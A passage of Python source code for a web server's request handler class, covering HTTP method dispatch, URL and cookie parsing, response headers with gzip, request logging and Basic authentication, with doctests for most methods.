Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.path = '/do_GET'
>>> handler.server.web.external_redirects = (('POST:.*', ''),)
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.external_redirects = (
... ('*:(.+)', '/\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.internal_redirects = (
... ('*:(.+)', '-:\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET/" ...
>>> handler.path = __test_folder__.path
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/..." ...
>>> handler.server.web.internal_redirects = (
... ('*:(.+)', 'PUT:\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET/" ...
'''
self.external_type = self.type = self.type if self.type else 'get'
self.create_environment_variables()
authentication = self._is_authenticated()
if authentication[0]:
valid_request = self._is_valid_request()
if valid_request:
if self._handle_redirect():
return self
if self.path:
if self._is_valid_reference():
return self._set_dynamic_or_static_get(
file_name=self.path)
elif self._default_get():
return self
return self._send_no_file_error(valid_request)
return self._send_no_authorization_error(output=authentication[1])
@JointPoint
# # python3.5 def do_POST(self: Self) -> Self:
def do_POST(self):
'''
Is triggered if a post request comes in.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_POST() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_PATCH(self: Self) -> Self:
def do_PATCH(self):
'''
Is triggered if a patch request comes in.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_PATCH() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_DELETE(self: Self) -> Self:
def do_DELETE(self):
'''
Is triggered if a delete request comes in.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_DELETE() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_PUT(self: Self) -> Self:
def do_PUT(self):
'''
Is triggered if a put request comes in.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_PUT() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_HEAD(self: Self) -> Self:
def do_HEAD(self):
'''
Is triggered if a head request comes in.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_HEAD() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
self.type = inspect.stack()[0][3][builtins.len('do_'):].lower()
return self.do_GET()
# # # endregion
@JointPoint
# # python3.5
# # def parse_url(self: Self, url=None, strict=False) -> builtins.tuple:
def parse_url(self, url=None, strict=False):
# #
'''
This method provides an easy way to split a http request string \
into its components.
**url** - URL to parse.
**strict** - Determines whether to parse url with no error \
tolerance. Incorrect parameters will be omitted.
Returns a tuple consisting of the parse result and a dictionary \
containing the get parameters.
>>> sys_argv_backup = copy(sys.argv)
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.request_parameter_delimiter = '?'
>>> sys.argv = sys.argv[:1]
>>> handler.parse_url()
(None, {})
>>> sys.argv[1:] = ['hans']
>>> handler.parse_url() # doctest: +ELLIPSIS
(ParseResult(...'hans'...), {})
>>> sys.argv[1:] = ['?hans=peter']
>>> handler.parse_url() # doctest: +ELLIPSIS
(ParseResult(..., {'hans': 'peter'})
>>> sys.argv[1:] = ['?hans=peter&s']
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.parse_url(strict=True) # doctest: +ELLIPSIS
(ParseResult(...'hans=peter&s'...})
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'... "?hans=peter&s" is not a valid get query string.\\n'
>>> sys.argv = sys_argv_backup
'''
if url is None and builtins.len(sys.argv) > 1:
url = sys.argv[1]
if url:
# # python3.5
# # url = regularExpression.compile(
# # self.server.web.request_parameter_delimiter
# # ).sub('?', url, 1)
# # parse_result = parse_url(url)
url = regularExpression.compile(
self.server.web.request_parameter_delimiter
).sub('?', convert_to_unicode(url), 1)
parse_result = parse_url(convert_to_string(url))
# #
get = {}
if parse_result.query:
try:
# # python3.5
# # get = parse_url_query(
# # qs=parse_result.query, keep_blank_values=True,
# # strict_parsing=strict,
# # encoding=self.server.web.encoding,
# # errors='replace')
get = parse_url_query(
qs=parse_result.query, keep_blank_values=True,
strict_parsing=strict)
# #
except builtins.ValueError:
__logger__.info(
'"%s" is not a valid get query string.', url)
for key, value in get.items():
# # python3.5
# # get[key] = value[0]
get[convert_to_unicode(key)] = convert_to_unicode(
value[0])
# #
return parse_result, get
return None, {}
@JointPoint
# # python3.5
# # def send_response(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def send_response(self, *arguments, **keywords):
# #
'''
Sends the given response code to the client if no response code was \
sent yet.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... ).send_response() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not (self.response_sent or __test_mode__):
if builtins.len(arguments) > 1 and builtins.isinstance(
arguments[1], builtins.str
):
arguments = builtins.list(arguments)
arguments[1] = arguments[1].replace('\n', '\\n')
arguments = builtins.tuple(arguments)
self.response_sent = True
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def send_error(
# # self: Self, code: builtins.int, message: builtins.str,
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> Self:
def send_error(self, code, message, *arguments, **keywords):
# #
'''
Sends the given error to the client if no response code was sent yet.
**code** - Error code to send.
'''
if not (self.response_sent or __test_mode__):
self.content_type_sent = self.content_length_sent = True
self.send_response(code)
# # python3.5 pass
message = convert_to_string(message)
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(code, message, *arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def list_directory(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def list_directory(self, *arguments, **keywords):
# #
'''
Generates a simple html web page listing requested directory \
content.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> handler.requested_file = FileHandler()
>>> handler.list_directory() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and param...
'''
path_backup = self.path
self.path = self.requested_file.path[builtins.len(
self.server.web.root.path
) - builtins.len(os.sep):]
'''Take this method via introspection.'''
if not __test_mode__:
file_handler = builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(self.requested_file._path, *arguments, **keywords)
self._send_output(output=file_handler)
self.path = path_backup
return self
@JointPoint
# # python3.5
# # def end_headers(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def end_headers(self, *arguments, **keywords):
# #
'''Finishes all sent headers with a trailing empty line.'''
if not (self.headers_ended or __test_mode__):
self.headers_ended = True
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def send_static_file_cache_header(
# # self: Self, timestamp=time.time(), response_code=200,
# # cache_control_header='public, max-age=0', expire_time_in_seconds=0
# # ) -> Self:
def send_static_file_cache_header(
self, timestamp=time.time(), response_code=200,
cache_control_header='public, max-age=0', expire_time_in_seconds=0
):
# #
'''
Sends static file cache headers as response.
**timestamp** - Timestamp to use as last modified \
time.
**response_code** - Response code to send if not sent yet.
**cache_control_header** - Cache control header string.
**expire_time_in_seconds** - Additional time to current timestamp \
for expires header.
'''
if not __test_mode__:
self.send_response(response_code).send_header(
'Cache-Control', cache_control_header)
self.send_header('Last-Modified', self.date_time_string(timestamp))
self.send_header('Expires', self.date_time_string(
timestamp + expire_time_in_seconds))
return self
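# NOTE: A hypothetical call caching a static response for one hour
# ("handler" stands for a request handler instance):
#
#     handler.send_static_file_cache_header(
#         cache_control_header='public, max-age=3600',
#         expire_time_in_seconds=3600)
#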
@JointPoint
# # python3.5
# # def get_cookie(
# # self: Self, name=None
# # ) -> (builtins.str, cookies.SimpleCookie, builtins.type(None)):
def get_cookie(self, name=None):
# #
'''
Retrieves a http cookie.
**name** - If provided only the matching value will be returned \
instead of the whole cookie object.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('hans: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('hans', 'hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans=hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans=hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='hans'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: ha/ns=hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'ha/ns=hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='hans'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...WARNING... - Invalid cookie detected "ha/ns=hans". ...'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: >
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans='), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans=')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans=''>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: h/a//ns////=ha/ns'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'h/a//ns////=ha/ns')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='ha/ns'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...WARNING... - Invalid cookie detected ...'
'''
# # python3.5 if 'cookie' in self.headers:
if self.headers.get('cookie'):
cookie = cookies.SimpleCookie()
# # python3.5
# # cookie_content = self.headers.get('cookie')
cookie_content = convert_to_unicode(self.headers.get('cookie'))
# #
while True:
try:
# # python3.5
# # cookie.load(cookie_content)
cookie.load(convert_to_string(cookie_content))
# #
except cookies.CookieError as exception:
new_cookie_content = regularExpression.compile(
'([^=]*)/+([^=]*=[^;]*(?:;|$))'
).sub('\\1\\2', cookie_content)
if cookie_content == new_cookie_content:
# # python3.5
# # __logger__.critical(
# # 'Invalid cookie detected "%s". %s: %s',
# # cookie_content,
# # exception.__class__.__name__,
# # builtins.str(exception))
__logger__.critical(
'Invalid cookie detected "%s". %s: %s',
cookie_content, exception.__class__.__name__,
convert_to_unicode(exception))
# #
return None
else:
# # python3.5
# # __logger__.warning(
# # 'Invalid cookie detected "%s". %s: %s. Trying '
# # '"%s".', cookie_content,
# # exception.__class__.__name__,
# # builtins.str(exception), new_cookie_content)
__logger__.warning(
'Invalid cookie detected "%s". %s: %s. '
'Trying "%s" .', cookie_content,
exception.__class__.__name__,
convert_to_unicode(exception),
new_cookie_content)
# #
cookie_content = new_cookie_content
else:
break
# # python3.5
# # return cookie[
# # name
# # ].value if name and name in cookie else cookie
return convert_to_unicode(
cookie[name].value
) if name and name in cookie else cookie
# #
return None
@JointPoint
# # python3.5
# # def send_cookie(
# # self: Self,
# # cookie: (cookies.SimpleCookie, builtins.str, builtins.dict),
# # header='Set-Cookie', maximum_age_in_seconds=60 * 60 * 24 * 7,
# # version=1, domain='', secure=False, httponly=False, comment='',
# # path='/', response_code=200
# # ) -> Self:
def send_cookie(
self, cookie, header='Set-Cookie',
maximum_age_in_seconds=60 * 60 * 24 * 7, version=1, domain='',
secure=False, httponly=False, comment='', path='/',
response_code=200
):
# #
'''
Sends a http cookie.
**cookie** - Cookie object, dictionary or string.
**header** - HTTP Header to use.
**maximum_age_in_seconds** - Maximum age of given cookie. Default \
is 7 days.
**version** - Given cookie version.
**domain** - The domain the cookie should be bound \
to.
**secure** - Indicates whether only secure \
connections should be associated \
with given cookie.
**httponly** - Disables JavaScript access to given \
cookie.
**comment** - A comment provided for given cookie.
**path** - Web path the cookie should be bound to.
**response_code** - Response code to send if not sent yet.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.send_cookie('') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.send_cookie('key=value;a=1') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.send_cookie({}) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> if sys.version_info.major < 3:
... handler.send_cookie(
... {str('key'): str('value'), str('a'): 1}
... ) # doctest: +ELLIPSIS
... else:
... handler.send_cookie({'key': 'value', 'a': 1})
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> cookie = cookies.SimpleCookie()
>>> if sys.version_info.major < 3:
... cookie[str('key')] = str('value')
... cookie[str('a')] = 1
... else:
... cookie['key'] = 'value'
... cookie['a'] = 1
>>> handler.send_cookie(cookie) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not builtins.isinstance(cookie, cookies.SimpleCookie):
cookie_object = cookies.SimpleCookie()
# # python3.5
# # if builtins.isinstance(cookie, builtins.str):
if builtins.isinstance(cookie, (
builtins.unicode, builtins.str
)):
# #
cookie_object.load(cookie)
else:
for key, value in cookie.items():
# # python3.5 cookie_object[key] = value
cookie_object[convert_to_string(key)] = value
cookie = cookie_object
expires = self.date_time_string(time.time() + maximum_age_in_seconds)
cookie = regularExpression.compile('^[^:]+: *').sub(
'', cookie.output()
) + (
';version="%s";expires=%s;Max-Age=%d;Path=%s;comment=%s;'
'domain=%s%s%s' % (
builtins.str(version), expires, maximum_age_in_seconds, path,
comment, domain, ';secure' if secure else '',
';httponly' if httponly else ''))
if not __test_mode__:
self.send_response(response_code).send_header(header, cookie)
return self
@JointPoint
# # python3.5
# # def send_content_type_header(
# # self: Self, mime_type='text/html', encoding=None,
# # response_code=200
# # ) -> Self:
def send_content_type_header(
self, mime_type='text/html', encoding=None, response_code=200
):
# #
'''
Sends a content type header to the client if not sent yet.
**mime_type** - Mime type to send to client.
**encoding** - Encoding description to send to client.
**response_code** - HTTP Response code to send.
Additional arguments and keywords will be forwarded to \
"self.send_header()" method.
'''
if not (self.content_type_sent or __test_mode__):
self.content_type_sent = True
self.send_response(response_code)
charset = ''
# TODO check new branch
if encoding is None:
charset = '; charset=%s' % self.server.web.encoding.replace(
'_', '-')
# # python3.5
# # elif builtins.isinstance(encoding, builtins.str):
elif builtins.isinstance(encoding, (
builtins.unicode, builtins.str
)):
# #
charset = '; charset=%s' % encoding.replace('_', '-')
self.send_header('Content-Type', '%s%s' % (mime_type, charset))
return self
@JointPoint
# # python3.5
# # def send_content_length_header(
# # self: Self, size: builtins.int, dynamic_output='',
# # response_code=200
# # ) -> Self:
def send_content_length_header(
self, size, dynamic_output='', response_code=200
):
# #
'''
Sends the content length header to the client if not sent yet.
**size** - Content length to send.
**dynamic_output** - Indicates whether output should be forced to be \
compressed because it is simply a computed \
string.
**response_code** - HTTP Response code to send.
'''
if not (self.content_length_sent or __test_mode__):
self.content_length_sent = True
self.send_response(response_code)
threshold = self.server.web.file_size_stream_threshold_in_byte
# # python3.5
# # if(size < threshold and
# # 'accept-encoding' in self.headers and
# # gzip.__name__ in self.headers.get('accept-encoding').split(
# # ','
# # ) and (dynamic_output or Iterable(
# # self.server.web.compressible_mime_type_pattern
# # ).is_in_pattern(value=self.requested_file.mime_type))):
if(size < threshold and
self.headers.get('accept-encoding', False) and
gzip.__name__ in builtins.map(
lambda name: convert_to_unicode(name), self.headers.get(
'accept-encoding'
).split(',')
) and (dynamic_output or Iterable(
self.server.web.compressible_mime_type_pattern
).is_in_pattern(value=self.requested_file.mime_type))):
# #
self.send_header('Content-Encoding', gzip.__name__)
if dynamic_output:
self._encoded_output = self._gzip(content=dynamic_output)
else:
self._encoded_output = self._gzip(
content=self.requested_file.get_content(mode='rb'))
self.send_header('Content-Length', builtins.len(
self._encoded_output))
else:
self.send_header('Content-Length', size)
return self
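# NOTE: A self contained sketch of gzip compressing a payload with the
# standard library, comparable to what the "_gzip()" helper used above is
# expected to do:
#
#     import gzip
#     import io
#     buffer = io.BytesIO()
#     with gzip.GzipFile(fileobj=buffer, mode='wb') as file_object:
#         file_object.write(b'payload')
#     compressed_payload = buffer.getvalue()
#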
@JointPoint
# # python3.5
# # def log_message(
# # self: Self, format: builtins.str,
# # message_or_error_code: (builtins.int, builtins.str),
# # response_code_or_message: (builtins.str, builtins.int),
# # message_end=None
# # ) -> Self:
def log_message(
self, format, message_or_error_code, response_code_or_message,
message_end=None
):
# #
'''
Wrapper method for all logging output coming through the server \
thread.
**format** - Logging format. Allowed \
placeholders are: "client_ip", \
"client_port", \
"request_description", \
"response_code", "forwarded_ip", \
"forwarded_host", \
"forwarded_server" and \
"server_port".
**message_or_error_code** - Logging message or resulting HTTP \
code.
**response_code_or_message** - Resulting HTTP code or response \
message.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.client_address = '192.168.0.1', 80
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.log_message('', 404, '') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...404...'
>>> handler.server.web.__class__.instances = [handler.server.web]
>>> handler.log_message('', 404, '') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(String(
... 'x-forwarded-for: 192.168.0.1\\n'
... 'x-forwarded-host: 192.168.0.1\\n'
... 'x-forwarded-server: 192.168.0.1'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'x-forwarded-for', '192.168.0.1')
... handler.headers.add_header(
... 'x-forwarded-host', '192.168.0.1')
... handler.headers.add_header(
... 'x-forwarded-server', '192.168.0.1')
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.log_message('', '', 404) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...192.168.0.1:80 -> ...404... - forwarded for: 192.168.0.1 - ...
'''
format = (
'{client_ip}:{client_port} {request_description} -> '
'%s{response_code}%s')
forwarded_ip = forwarded_host = forwarded_server = None
if 'headers' in self.__dict__:
# # python3.5
# # forwarded_ip = self.headers.get('x-forwarded-for')
# # forwarded_host = self.headers.get('x-forwarded-host')
# # forwarded_server = self.headers.get('x-forwarded-server')
forwarded_ip = self.headers.get('x-forwarded-for')
forwarded_host = self.headers.get('x-forwarded-host')
forwarded_server = self.headers.get('x-forwarded-server')
# #
'''
NOTE: We have to save the scope here to forward it into the \
function since it will be determined by introspection.
'''
scope = builtins.locals()
for header_name in builtins.filter(
lambda header_name: scope[header_name], (
'forwarded_ip', 'forwarded_host', 'forwarded_server'
)
):
scope[header_name] = convert_to_unicode(scope[header_name])
format += ' - forwarded for: {%s}' % header_name
if builtins.len(self.server.web.__class__.instances) > 1:
format += ' (server port: {server_port})'
request_description = message_or_error_code
response_code = response_code_or_message
if builtins.isinstance(message_or_error_code, builtins.int):
request_description = response_code_or_message
response_code = message_or_error_code
# # python3.5
# # if builtins.isinstance(request_description, builtins.bytes):
# # # TODO check branch
# # request_description = '...bytes...'
if builtins.isinstance(request_description, builtins.str):
try:
request_description = convert_to_unicode(
request_description)
except builtins.UnicodeDecodeError:
request_description = '...bytes...'
# #
color_wrapper = self._determine_logging_color(response_code)
__logger__.info((format % color_wrapper).format(
client_ip=self.client_address[0],
client_port=self.client_address[1],
request_description=request_description,
response_code=response_code, forwarded_ip=forwarded_ip,
forwarded_host=forwarded_host, forwarded_server=forwarded_server,
server_port=self.server.web.port))
return self
@JointPoint
# # python3.5
# # def setup(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
def setup(self, *arguments, **keywords):
# #
'''
This method wraps python's native request handler to provide \
our wrapped file socket buffer.
'''
'''Take this method via introspection.'''
result = builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
self.rfile = self.server.web.service.read_file_socket
return result
@JointPoint
# # python3.5
# # def create_environment_variables(self: Self) -> builtins.str:
def create_environment_variables(self):
# #
'''Creates all request specific environment variables.'''
# # python3.5
# # self._determine_host().uri = self.external_uri = self.path
self._determine_host().uri = self.external_uri = \
convert_to_unicode(self.path)
# #
self._handle_redirect(external=False)
# # python3.5
# # match = regularExpression.compile(
# # '[^/]*/+(?P<path>.*?)(?:{delimiter}(?P<parameter>.*))?'.format(
# # delimiter=self.server.web.request_parameter_delimiter)
# # ).fullmatch(self.uri)
match = regularExpression.compile(
'[^/]*/+(?P<path>.*?)'
'(?:{delimiter}(?P<parameter>.*))?$'.format(
delimiter=self.server.web.request_parameter_delimiter)
).match(self.uri)
# #
self.path = ''
if match:
# # python3.5
# # self.path = posixpath.normpath(unquote_url(match.group(
# # 'path')))
self.path = convert_to_unicode(posixpath.normpath(unquote_url(
convert_to_string(match.group('path')))))
# #
if self.path == '.':
self.path = ''
self.parameter = match.group('parameter')
self.requested_file = FileHandler(
location=self.server.web.root.path + self.path)
self._authentication_location = self.server.web.root
if self.requested_file:
self._authentication_location = self.requested_file
if self.requested_file.is_file():
self._authentication_location = self.requested_file.directory
cookie_handler = self.get_cookie()
if cookie_handler is not None:
for key, morsel in cookie_handler.items():
self.cookie[key] = morsel.value
self.get = self.parse_url(self.uri)[1]
# #
return self.path
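# NOTE: A sketch of the path/parameter split performed above, using the
# default request parameter delimiter "?" directly:
#
#     import re
#     match = re.compile(
#         '[^/]*/+(?P<path>.*?)(?:\?(?P<parameter>.*))?$'
#     ).match('/directory/file.html?a=1&b=2')
#     assert match.group('path') == 'directory/file.html'
#     assert match.group('parameter') == 'a=1&b=2'
#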
# # endregion
# # region protected
# # # region boolean
@JointPoint
# # python3.5 def _is_authenticated(self: Self) -> builtins.tuple:
def _is_authenticated(self):
'''
Determines whether the current request is authenticated. Returns a \
tuple: the first item indicates whether authentication succeeded and \
the second item holds html content to send if authentication \
fails, or "None" if nothing should be sent automatically.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._authentication_location = __test_folder__
>>> handler._is_authenticated()
(True, None)
>>> file = FileHandler(
... __test_folder__.path + '_is_authenticated',
... make_directory=True)
>>> handler.path = '/' + file.name
>>> handler.create_environment_variables()
'_is_authenticated'
>>> handler._is_authenticated()
(True, None)
>>> FileHandler(file.path + '.htpasswd').content = 'login:password'
>>> handler.path = '/' + file.name
>>> handler.create_environment_variables()
'_is_authenticated'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler._is_authenticated()
(False, None)
>>> handler.server.web.authentication_file_name = ''
>>> handler._is_authenticated()
(True, None)
>>> handler.server.web.authentication = False
>>> handler._is_authenticated()
(True, None)
'''
if self.server.web.authentication:
while self.server.web.authentication_file_name:
file_path = (
self._authentication_location.path +
self.server.web.authentication_file_name)
authentication_file = FileHandler(location=file_path)
if authentication_file:
return (
# # python3.5
# # self.headers.get('authorization') ==
# # 'Basic %s' % self._get_login_data(
# # authentication_file
# # ), None)
convert_to_unicode(self.headers.get(
'authorization'
)) == 'Basic %s' % self._get_login_data(
authentication_file
), None)
# #
if self._authentication_location == self.server.web.root:
break
self._authentication_location = \
self._authentication_location.directory
# # python3.5
# # login_data_match = regularExpression.compile(
# # '(?P<name>[^:]+):(?P<password>.+)$'
# # ).match(base64_decode(
# # self.headers.get('authorization', '')[builtins.len(
# # 'Basic '
# # ):]
# # ).decode(self.server.web.encoding))
login_data_match = regularExpression.compile(
'(?P<name>[^:]+):(?P<password>.+)$'
).match(base64_decode(self.headers.get(
'authorization', ''
)[builtins.len('Basic '):]))
# #
login_data = None
if login_data_match:
login_data = {
'name': login_data_match.group('name'),
'password': login_data_match.group('password')}
if self.server.web.authentication_handler is not None:
return self.server.web.authentication_handler(login_data, self)
return True, None
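# NOTE: A minimal sketch of the Basic authentication check performed
# above, assuming a "login:password" style authentication file as used
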